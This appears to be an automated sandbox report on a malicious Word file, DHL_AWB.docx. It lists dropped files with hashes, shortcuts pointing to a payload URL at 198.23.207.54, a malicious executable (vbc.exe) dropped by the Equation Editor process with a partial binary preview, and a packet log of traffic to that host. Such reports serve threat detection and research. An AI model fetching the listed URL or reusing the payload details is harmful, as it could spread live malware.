C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ADD09414-4C0B-48D8-B1C9-FBE697880796}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{3AB18AF9-D831-436F-81B4-5DCFDD3A591A}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025630255835805735
Encrypted:	false
SSDEEP:	6:I3DPc9F0x79HvxggLRCIwTUEJD/+DRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQFK79PD09D8vYg3J/
MD5:	D9DF92B4088F96B1B5FC09676583EB69
SHA1:	EB2238143071EE47E99F673C31CF49E9F294FD2E
SHA-256:	2F2C5E1E1CD2BE8D18165133BFED51F5D107289737A66E345E1F0EEB32790935
SHA-512:	DEA51F1A72D311A2AACE701803FB5A5CA3853198D4DD11FEBA24F54BA451229E8FDFEFC027D88844866277B3FD1DD9FD7CCDC10F5C5C12EC43C9E5C31427F4E3
Malicious:	false
Preview:	......M.eFy...zM.. .])C...4...S,...X.F...Fa.q............................I....u.@..................v.\|.K......B.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{4820A152-87F7-4CDD-BC04-BD9F9E14497A}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025464168013612485
Encrypted:	false
SSDEEP:	6:I3DPctZzRvxggLR5Iblub7btRXv//4tfnRujlw//+GtluJ/eRuj:I3DPqzdy8fvYg3J/
MD5:	25C44748FA2AF59D0525599DFE3E7276
SHA1:	47E3D19F25EB04D915F075A29AD6E64CF894120F
SHA-256:	47976FC297A385607935B5BB1033AAC43D866B8432A76DD36DFB085641DB9280
SHA-512:	7CFA191BCADE2EBE77F5FAD074935A88C8478D415485C644E43B19C14BD16EF4EC303D96567BE26AB728AE08FC4E2FD0852DCD3A9AE55FC133BC48272E9F3D0C
Malicious:	false
Preview:	......M.eFy...z.....m.F.&.&..)YS,...X.F...Fa.q............................n.0P9..C......D..........MC.\|}.C...gE........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DHL_AWB.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Fri Aug 5 22:36:11 2022, length=73762, window=hide
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.555888169107197
Encrypted:	false
SSDEEP:	12:85PkVcRgXg/XAlCPCHaXRBktB/eLX+WnW6//xgiCuxicvb7jKlaluzNDtZ3YilMX:85SU/XThOMpW0/xfC7efel2WDv3q+u7D
MD5:	C70C78DA7C5BCD7CB1D99269A2CC225D
SHA1:	3D70937097E814620A5A3C1B13DEE888A4194E05
SHA-256:	C4676842DCE920B886F103CCDECC4419D98FFE9ABEA7C46F8765DB224387D9F5
SHA-512:	9E0404201C950F58D8ED5EB8FC6BBA81022604EE1681442AE0271B427C5370455BA311C2CF0C6C465DAAE7E4106F20BD1B69685FD2116CF5088D2FBE8D4DE8D3
Malicious:	false
Preview:	L..................F.... ...G....3..G....3..A.\%$..." ...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2." ...U.. .DHL_AW~1.DOC..F......hT..hT.....r.....'...............D.H.L._.A.W.B...d.o.c.x.......v...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\DHL_AWB.docx.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.H.L._.A.W.B...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9G..N..... .....[D_....3N...W...9G..N..... .....[

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc_200.doc.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://198.23.207.54/shp/doc_200.doc>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.836709011755517
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/PdiGEN6da4vn:HRYFVm/P5ai
MD5:	854115C81B205A544502E2818BBF65F4
SHA1:	BC550642E36839CC57239AF9DF21F9ECB85A50A2
SHA-256:	73F4DA39E7522E1489E7D60D16EB520F1A98C34D1ED6B4A68741594CF344D80C
SHA-512:	1664636ED0C56ABB8BFC5D2A2A5A2DA1F4EB76212F656AD636FFC272641CFBD79E8C30EE3C482FAD6BEB1ECA319E2C9DF6A9E3686100C56C054CA53E5F1C14C3
Malicious:	false
Preview:	[InternetShortcut]..URL=http://198.23.207.54/shp/doc_200.doc..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	120
Entropy (8bit):	5.045246041828526
Encrypted:	false
SSDEEP:	3:bDuMJlOQFjWGEAUxVomX185t6MWqbUVov:bCiRwE5tlMy
MD5:	E517D796A0E9B9A1DF81B08C740E90AD
SHA1:	01F83FCE0E0EAA90A51AA1298619283AF34A961B
SHA-256:	77FA752E9C37C14F7DA138E0FB54AFB6D4A0DDDD2E9455311CBAC93EF8BA8389
SHA-512:	1555C3997E2B1D77E703FE5C90F3659DA0BFC9399D73BA2F99B111AF1F5F53CF15CA51F7368864E546C8C9BF48CE5A954C894E53000A3D94C52A25F989FA1E58
Malicious:	false
Preview:	[folders]..Templates.LNK=0..shp on 198.23.207.54.url=0..DHL_AWB.LNK=0..[doc]..doc_200.doc.url=0..[misc]..DHL_AWB.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\shp on 198.23.207.54.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://198.23.207.54/shp/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	51
Entropy (8bit):	4.7504733810175
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/PdiGENTv:HRYFVm/Piv
MD5:	46A639CD78DEE3C4130F75B16EB43441
SHA1:	85F9CBF118E724820E416501AA28E47F7300C44C
SHA-256:	ACC86E0815BE20587964793109453BB47EF53800B2763BA5B7058507EACA12EF
SHA-512:	004459F949109ACB8607884296B1E679AB68B4A8E456514BE43B1E1E4566E9340790606B93918F2AFC25EB2A25503B040E374BC0E028F677ED9EC0741A925677
Malicious:	false
Preview:	[InternetShortcut]..URL=http://198.23.207.54/shp/..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:	7CFA404FD881AF8DF49EA584FE153C61
SHA1:	32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:	248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:	F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

C:\Users\user\Desktop\~$HL_AWB.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:	7CFA404FD881AF8DF49EA584FE153C61
SHA1:	32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:	248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:	F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

C:\Users\Public\vbc.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	839680
Entropy (8bit):	7.820966123278669
Encrypted:	false
SSDEEP:	24576:k81ENl0PsO9ZzPhSB4v3gtfC7PRqEzwFRaQS:Til0PsO99PhuU3WfC7PR3zwFD
MD5:	DD7507C4B13050E9A433A7BD70F7591F
SHA1:	7706C0E624EEFC87602805F449E4AF20893DBC00
SHA-256:	676A71156FF2422AF1B291E83030EF217607574E2EEB0344AF54A4CD7E99D8A8
SHA-512:	DDBAB3F63DA65808F1A2F8DEF5EE453320F61C390A2530BD4B33275CCC6788234D6FB2DAB737ADDCC340D42A71B6DE5E5EB59491F8C06D8348DF089F5FB5A537
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 31%, Browse Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: Payment_Advice.docx, Detection: malicious, Browse Filename: List.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._]................0.................. ........@.. .......................@............@.................................H...O............................ ......,................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................\|.......H.......p\...X......7...4....0..........................................^..}.....(.......(......0......................9......{....o....o....s.......{....o....o.....+].o....t..............o.....o....o....o.........(........,...........o ......+.........o!......o"...-....u........,...o#......{....o$....o%...o&...&..........:.i........0..2.........{....o'...o.....0..+..{....o'....o(...o)....+.....0..:..........1...{....o$...o.....+....,...{....o$....o+....o,.....*...0......

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.979632029644996
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	DHL_AWB.docx
File size:	73762
MD5:	aaea73067b34013e5c1c9715dcf715a4
SHA1:	a1cf21c352a13b91a2b0ab22c4367e07151c4292
SHA256:	c7351eddf1e255e0b5d5d6c7dbd054427f5fef62b7cd9d25b67166e57df21d9b
SHA512:	b516045d2be903dbb92b166e057fb2d48aebff68c6cec1cbf035c9197e70324cacbbab36307b2bf644525186bf4e6d8e918be89f090694560a75b69cab66b3f3
SSDEEP:	1536:+Uk/JREcKLAG51Y5/kPMqvyM76mC178spn0jQWa:+1BKLAA5PPn2F1XCRa
TLSH:	677302E249C542DCDF8186328F9ADF7BDA58DCD259AB972C46E1983C98734CA8720C18
File Content Preview:	PK...........Um.K.p...........[Content_Types].xmlUT...(..b(..b(..b...n.0.E......Ub.....>.-R...x.V......c^..$j.M.d..{&..7X...!.r.d...2....NJ.5z..Y.QX)..P.. ..ooz....Hm.d.....XM..,..K...#"=...............`c.....^..3...%.....Y...KQ%S&..y.......D.{.....V...

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 16:35:57.657021999 CEST	49171	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:35:57.772166014 CEST	80	49171	198.23.207.54	192.168.2.22
Aug 5, 2022 16:35:57.772438049 CEST	49171	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:35:57.773119926 CEST	49171	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:35:57.904737949 CEST	80	49171	198.23.207.54	192.168.2.22
Aug 5, 2022 16:35:57.905028105 CEST	49171	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:03.414978981 CEST	80	49171	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:03.415060997 CEST	49171	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:03.827739000 CEST	49172	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:03.942446947 CEST	80	49172	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:03.942589998 CEST	49172	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:03.946072102 CEST	49172	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:04.061631918 CEST	80	49172	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:04.265516996 CEST	49172	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:08.558005095 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:08.672599077 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:08.672693968 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:08.672837019 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:08.788412094 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:08.789035082 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:08.917889118 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:09.133138895 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:09.228274107 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:09.228429079 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:09.571985006 CEST	80	49172	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:09.572097063 CEST	49172	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:09.579025984 CEST	49172	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:09.693615913 CEST	80	49172	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:10.928634882 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:11.044210911 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:11.044513941 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:11.177066088 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:11.379708052 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:11.477384090 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:11.477473021 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.051573038 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.167243958 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.167733908 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.307225943 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.367007971 CEST	49171	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.367554903 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.480940104 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.481034994 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.481197119 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.481324911 CEST	80	49171	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.518726110 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.596581936 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596610069 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596620083 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596632004 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596643925 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596654892 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596667051 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596683979 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596694946 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596705914 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.596848011 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.596894979 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.600291014 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.618189096 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.618534088 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.710247040 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710285902 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710300922 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710304022 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710309029 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710321903 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710334063 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710350037 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710360050 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:12.710403919 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:12.710454941 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:13.094441891 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:13.209595919 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:13.209908009 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.717101097 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.831597090 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.831726074 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.833739042 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.950196981 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950225115 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950258017 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950273037 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950289011 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950305939 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950320959 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950324059 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.950335979 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950347900 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.950351954 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950352907 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.950356007 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.950366974 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:14.950376034 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.950402021 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:14.997078896 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.064938068 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.064975977 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.064990997 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065006018 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065021992 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065037966 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065052986 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065068960 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065083981 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065099955 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065114975 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065129042 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065144062 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065159082 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065174103 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065190077 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065197945 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.065203905 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065220118 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065232038 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.065236092 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065238953 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.065243006 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.065251112 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.065295935 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.065335035 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.068037033 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180202007 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180247068 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180274010 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180300951 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180330038 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180358887 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180387020 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180417061 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180465937 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180499077 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180505991 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180530071 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180532932 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180538893 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180542946 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180546999 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180558920 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180562973 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180579901 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180594921 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180605888 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180610895 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180617094 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180628061 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180643082 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180659056 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180664062 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180674076 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180676937 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180689096 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180704117 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180715084 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180718899 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180735111 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180749893 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180752039 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180767059 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180782080 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180794954 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180798054 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180813074 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180824041 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180828094 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180844069 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180855036 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180859089 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180876017 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180891991 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180892944 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180908918 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180924892 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.180931091 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180949926 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.180984974 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.181395054 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.182329893 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.182353973 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.182368994 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.182384014 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.182418108 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.182440042 CEST	49175	80	192.168.2.22	198.23.207.54
